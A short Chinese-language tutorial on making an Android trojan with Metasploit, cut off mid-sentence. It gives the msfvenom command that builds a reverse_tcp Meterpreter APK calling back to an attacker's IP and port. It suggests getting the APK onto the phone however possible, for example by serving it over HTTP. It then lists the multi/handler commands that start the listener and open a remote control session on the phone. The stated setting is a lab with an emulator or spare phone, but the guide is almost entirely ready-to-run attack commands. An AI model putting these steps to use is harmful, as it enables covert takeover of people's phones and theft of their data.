msf使用木马控制android手机

msf使用木马控制android手机

环境：

kali、手机模拟器（或不用的手机）。

要求

手机模拟器（或者手机）与电脑可以互相连通吗，即手机可以直接访问到kali。

步骤

1、制作木马。

命令：msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.32.135 lport=4444 > android_shell.apk；

2、手机安装木马。
想办法把木马放到手机模拟器（或者手机）里。
例如：kali开启http服务，然后手机链接、下载、安装。

3、kali开启监听。

这里要注意的是，此处的参数要与制作木马时的参数保持一致。

msfconsole			//开启msf
use exploit/multi/handler			//选择监听模块
set lhost 192.168.32.135			//设置参数监听段的ip（kali的ip）
set lport 4444						//设置参数监听使用的端口（kali的端口）
set payload android/meterpreter/reverse_tcp			//设置payload。（这一个必须设置）
run									//开始监听

4、成功，开启控制台。
输入？后下面显示的都是可用的命令。

例如文件上传：